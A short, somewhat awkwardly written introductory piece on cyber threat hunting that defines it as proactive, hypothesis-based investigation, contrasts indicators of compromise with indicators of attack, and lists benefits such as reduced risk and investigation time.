In recent trends, many adversaries remain hidden in an organization for a month before detection it has been too challenging for many organizations to detect and identify the cyber attacks, so it has become mandatory to have a clear understanding of the recent and current trends of cyber attacks.
Cyber threat hunting is a process of proactively detecting malicious or suspicious activity by investigating our internal system/organization to find/determine the advanced threats or the attack pattern using various tools and techniques.
Generally, threat hunting is termed as Hypothetical/Hypothesis based investigations where we usually create a new hypothesis to determine and investigate various attack patterns like IOC, IOA, Hashes malicious executable, etc.
IOC Vs IOA
IOC: Indicator of Compromise
Servers a attack evidence of potential intrusion on the host
IOA: Indicator of Attack
Identifies the end goal behind the cyber attack and techniques used by adversaries
Based on the recent attack vector organization doesn't relay on SOC team to wait for notification or alerts about something happens, so it required some proactivity detection to mitigate the risk before its happens Threat Hunting keeps on create hypothesis to investigate to find multiple patters
Benefits of Threat Hunting
Reduce Cyber Risk
Proactively detecting and responding adversaries attacks
Behavior based detection
Reduce investigation time
Controls False Positive